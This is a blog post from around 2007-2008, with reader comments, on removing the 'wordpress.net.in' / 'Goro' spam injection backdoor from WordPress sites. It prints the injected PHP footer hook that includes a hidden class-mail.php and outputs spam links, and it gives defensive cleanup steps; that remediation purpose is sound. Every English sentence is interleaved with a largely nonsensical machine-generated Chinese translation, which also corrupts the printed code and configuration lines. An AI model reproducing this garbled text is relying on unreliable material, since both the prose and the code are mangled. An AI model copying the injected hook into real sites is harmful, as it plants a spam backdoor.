I found this while browsing WordPress support forum, some of these victims update their default_filters.php and upload class-mail.php inside their WordPress without being aware that it’sa backdoor (wordpress.net.in).我发现,这同时浏览的WordPress支持论坛上,一些这些受害者的更新他们的default_filters.php并上传类mail.php内的WordPress没有意识到这是后门 ( wordpress.net.in ) 。 There is no class-mail.php in WordPress except class-phpmailer.php .是没有阶级mail.php在WordPress除阶级phpmailer.php 。 So don’t get confuse by it.因此,不要混淆它。
Below is a quick workaround on how you can removed the offending goro spamware injection before Google banned you from the internet pipes.下面是一个快速可行就如何您可以拆除违法戈罗 spamware注射液,然后Google禁止您从互联网上水管。
Workaround其他可行方案
- For temporary disable remote include in php.ini settings.暂时停用远端包括在php.ini中设置。
;;;;;;;;;;;;;;;;;; ; Fopen wrappers ; ;;;;;;;;;;;;;;;;;; ; Whether to allow the treatment of URLs (like http:// or ftp://) as files. ;;;;;;;;;;;;;;;;;; ; fopen包装; ;;;;;;;;;;;;;;;;;; ;是否允许治疗的网址(如http://或ftp:// )的档案。 allow_url_fopen = off allow_url_include = off allow_url_fopen =小康allow_url_include =小康
- Check your .htaccess for suspicious redirect.检查您的。 htaccess的可疑的重定向。
- Find class-mail.php inside “*/wp-includes/” directory and removed it.找到班主任mail.php内“ * /可湿性粉剂-包括/ ”的目录,并删除它。
- Find the following code inside “*/wp-includes/default_filters.php” and removed it找到以下代码内“ * / wp-includes/default_filters.php ” ,并删除它
add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775'); function wpc7c16<>b8466d864eeefd20050625c7775() { @include(’./wp-includes/class-mail.php’); if(sizeof($wparr)>0){ echo “!div id=\”goro\”!”; foreach($wparr as $k=>$v){ echo ““.ucwords($v[’key’]).”\n”; if($i ==$inum) break; } echo “!/div!”.$_footer; } } add_action ( ' wp_footer ' , ' wpc7c16b8466d864eeefd20050625c7775 ' ) ;功能wpc7c16 < > b8466d864eeefd20050625c7775 ( ) ( @包括( ' 。 /可湿性粉剂-包括/类mail.php ' ) ;如果( sizeof ( $ wparr ) > 0 ) (回声“ !学编号= \ “戈罗\ ” ! “ ; foreach ( $ wparr元,当K = >元,五) (回声” , “ 。 ucwords (元五[ '的关键'])." \ n ” ;如果美元(一 = = $ inum )打破; )回声“ ! /学!".$_页脚; ) ) Robots.txt Exclusion robots.txt的排斥
Optional - Prevent googlebot from indexing the static spam page. 可选 -防止G ooglebot索引静态垃圾邮件的网页。
Login to Wordpress Admin > Manage > Files > Other Files → Key in “Robots.txt”.登录的WordPress管理>管理>文件>其他文件 →关键在为“ robots.txt ” 。 Add the following code.添加以下代码。User-agent: Googlebot Disallow: /*?* Disallow: /*?使用者代理: Googlebot的不允许: / * ? *不允许: / * ?Refer robots.txt .指的robots.txt 。
Possible WordPress class (suspicious) files that would be tempered可能的WordPress级(可疑)的档案会锻炼
Md5 checksum the following files, compare it with official versions from WordPress Release Archive . MD5校验和下列文件,比较它与官方版本由WordPress所释放存档 。
The above methods only remove and disabled the spams links, there is no guarantee that it will protected you from future vulnerabilities.上述方法只是删除和禁用垃圾邮件的链接,我们不能保证它会保护你从未来的脆弱性。 Backup (or export your post using WordPress eXtended RSS -WRX) and perform a full upgrade .备份(或出口,您的帖子使用的WordPress扩展RSS的wrx )和执行完整的升级 。
- Dec 13, 2007 2007年12月13日
I just notice this recently.我只是注意到这个最近。 You’ll need to check your site HTTP Header.您需要检查您的网站的HTTP标头。 Most of the hijacked websites doesn’t response with correct HTTP Status Header (400<>500) .大部分被劫持的网站并不反应,以正确的HTTP状态标题( 400 < > 500 ) 。 My guess is they did this to cloak from being crawl by search engine spiders.我的猜测是,他们这样做,以掩饰从检索搜索引擎Spider 。 If you had cleaned all the infected files and your header doesn’t response correctly get a rookit scanner .如果您已清理所有受感染的文件和您的标题不正确的反应得到rookit的扫描仪 。
Check your website status header, try cloak your browser (UA) as Search Engine Crawler.检查您的网站上的地位,标题,请尝试斗篷您的浏览器( UA )的搜索引擎的抓取工具。 The following screenshot will show you how to setup this at web-sniffer.net.以下截图会告诉您如何将安装在这个网络sniffer.net 。

This methods may not work if the cloaking scripts used IP base tracking.这个方法可能无法正常工作,如果伪装的脚本使用的IP相应的跟踪。 So try on different user agent string (ie: inoktomi, askjeeves, ia_archiver).因此,尝试对不同用户代理字符串(即: inoktomi , askjeeves , ia_archiver ) 。
Firefox Browser Firefox浏览器
You can also override your useragent string with firefox ↓.您也可以凌驾您的UserAgent和字符串与Firefox ↓ 。
about:config → general.useragent.overide = ‘ ua strings ‘ 约:配置→ general.useragent.overide = ' 尿酸字符串 '
Wordpress.net.in Backdoor wordpress.net.in后门
Wordpress.net.in Doorway wordpress.net.in门口
Dec 24, 2007 → http://www.wordpress.net.in/mentors/alxumuk/ 2007年12月24日 → http://www.wordpress.net.in/mentors/alxumuk/
Backdoor Files后门档案
inside wp-includes directory.内可湿性粉剂-包括目录。
- compat.php - (replace with latest version) compat.php -( 替换为最新版本)
- class-mail.php delete阶级mail.php 删除
scan & removes all backdoor files and create a .htaccess file inside wp-includes & wp-content/plugins .扫描&删除所有后门文件和创建一个。 htaccess的档案内可湿性粉剂-包括 & wp-content/plugins 。 Then add the following code to disabled directory listing (prevent informations leak & Directory search index).然后将以下代码添加到残疾人士的目录列表(防止信息泄漏及目录搜寻索引) 。
Options -Indexes选择指标 Wordpress.net.in New Partner wordpress.net.in新的合作伙伴
Feb 23th 2008 , We found a similar signature like wordpress.net.in at qwetro.com (germany). 2008年2月23日 ,我们发现了类似的签名一样, wordpress.net.in在qwetro.com (德国) 。 Probably from the same attacker with different agenda.可能是来自同一攻击者与不同的议程。
Related Posts相关文章
- Bluehost HostMonster CEO’s Blog hacked (wordpress.net.in) bluehost hostmonster行政总裁的博客砍死( wordpress.net.in )
- Matt Heaton Bluehost Hostmonster CEO’s Hacked Again - Strike II 马特希亚bluehost hostmonster行政总裁的砍死再次-罢工二
External Links外部链接
- Websniffer View HTTP Request and Response Header websniffer查看HTTP请求和响应报头
- Wordpress Support Forum 在WordPress支持论坛
- National Vulnerability Database Wordpress 2.0 > 2.0.6 国家脆弱性数据库的WordPress 2.0 > 2.0.6










16 Responses to “How to Remove Wordpress.net.in Spam Injection” 16日的反应 , “如何删除垃圾邮件wordpress.net.in注射液”
[...] na enak problem, vendar o?itno jih je zelo malo rešilo vse skupaj. [ … … ]娜enak问题, vendar o ?伊特诺日报流行性乙型脑炎zelo马罗rešilo VSE 3.1 skupaj 。 Ampak Google dela ?udeže: How to Removed Wordpress.net.in Spam Injection Infected by ‘Goro’ Spam class-mail.php Backdoor In rešitev je [...] ampak的Google dela ? udeže :如何删除垃圾邮件wordpress.net.in注射感染'戈罗'垃圾邮件类mail.php后门在rešitev流行性乙型脑炎[ … … ]
[...] I’ve find some useful information on how to clean that mess on Kakkoi: How to Removed Wordpress.net.in Spam Injection. [ … … ]我已经找到一些有用的资料,就如何清洁说,一塌糊涂,就kakkoi :如何删除垃圾邮件wordpress.net.in注射。 [...] [ … … ]
[...] wordpress.net.in revealed a number of pages, including a blog entry by Avice De’vereux that described the symptoms and said they were caused by a spam injection hijack by [...] [ … … ] wordpress.net.in发现了一些页面,其中包括一个博客条目由阿维丝de'vereux所描述的症状,并说他们所造成的垃圾注射劫持由[ … … ]
[...] is what Gordon Dewis discovered: Googling wordpress.net.in revealed a number of pages, including a blog entry by Avice De’vereux that described the symptoms and said they were caused by a spam injection hijack by [...] [ … … ]是什么戈登dewis发现:使用Google wordpress.net.in发现了一些页面,其中包括一个博客条目由阿维丝de'vereux所描述的症状,并说他们所造成的垃圾注射劫持由[ .. 。 ]
[...] leads me to Avice’s perfectly wonderful life saving post, where she instructs how to remove [...] [ … … ]我要阿维丝的绝对美好的生活节水后,她在那里指示如何删除[ … … ]
[...] en is alle gehackte code gevonden. [ … … ]恩是alle gehackte代码gevonden 。 Mocht je last hebben van de div id=”Goro” hack kijk dan eens hier voor handige tips voor het verwijderen. mocht日本脑炎去年hebben范得学编号= “戈罗”哈克kijk丹eens海尔荷兰荷兰handige提示荷兰荷兰het verwijderen 。 Alhoewel ik voorlopig geen PC klusjes zou doen gaan we toch [...] alhoewel IK的voorlopig geen的PC klusjes邹doen gaan我们toch [ … … ]
I got hacked to, mine was spam links to我得到砍死,排雷是垃圾邮件的链接
donaldsensing.com:6666 donaldsensing.com : 6666[...] Related: Blogs Take Center Stage For Marketers And For Google How to Remove Wordpress.net.in Spam Injection [...] [ … … ]相关:博客采取的中心舞台,为营销和Google如何删除垃圾邮件wordpress.net.in注射液[ … … ]
I'm not sure who is "alxumuk" real name is, but there is an editor at DMOZ with similar display name.我不知道谁是“ alxumuk ”的真实姓名,但有一个编辑dmoz类似的显示名称。
Lack Resources 缺乏资源ATM I only have a few raw accesslog from Murray's blog & Jens's blog . Matt Heaton never replies. ATM的,我只是有一些原料accesslog由Murray的博客 & 延的博客 。 马特希亚从来没有答复。
I hope that Mr. Goro got careless and show his footprint, I need more raw access log.我希望先生戈罗得到不小心,并表现出他的足迹,我需要更多的原料访问日志中。 Send it to my email它发送给我的电子邮件
[...] might go Here to learn the way to remove the Spam [...] [ … … ]可能转到这里来学习的方式,以消除垃圾邮件[ … … ]
Co-Founder of Mozilla Project WordPress Blog's Hacked... Blake Ross, the Co-Founder of Mozilla Project WordPress Blog's Hacked by Wordpress.net.in Blackhat Spammer. 的共同创始人Mozilla项目的WordPress博客的砍死...布雷克罗斯,共同创办人Mozilla项目的WordPress博客的骇wordpress.net.in blackhat垃圾邮件发送者。 ......
[...] het te maken had met spam injection hijack by wordpress.net.in. [ … … ] het特maken会见了垃圾邮件注射劫持由wordpress.net.in 。 Meer info over het probleem kan je hier vinden. meer信息超过het probleem根流行性乙型脑炎海尔vinden 。 De eenvoudigste oplossing voor het problee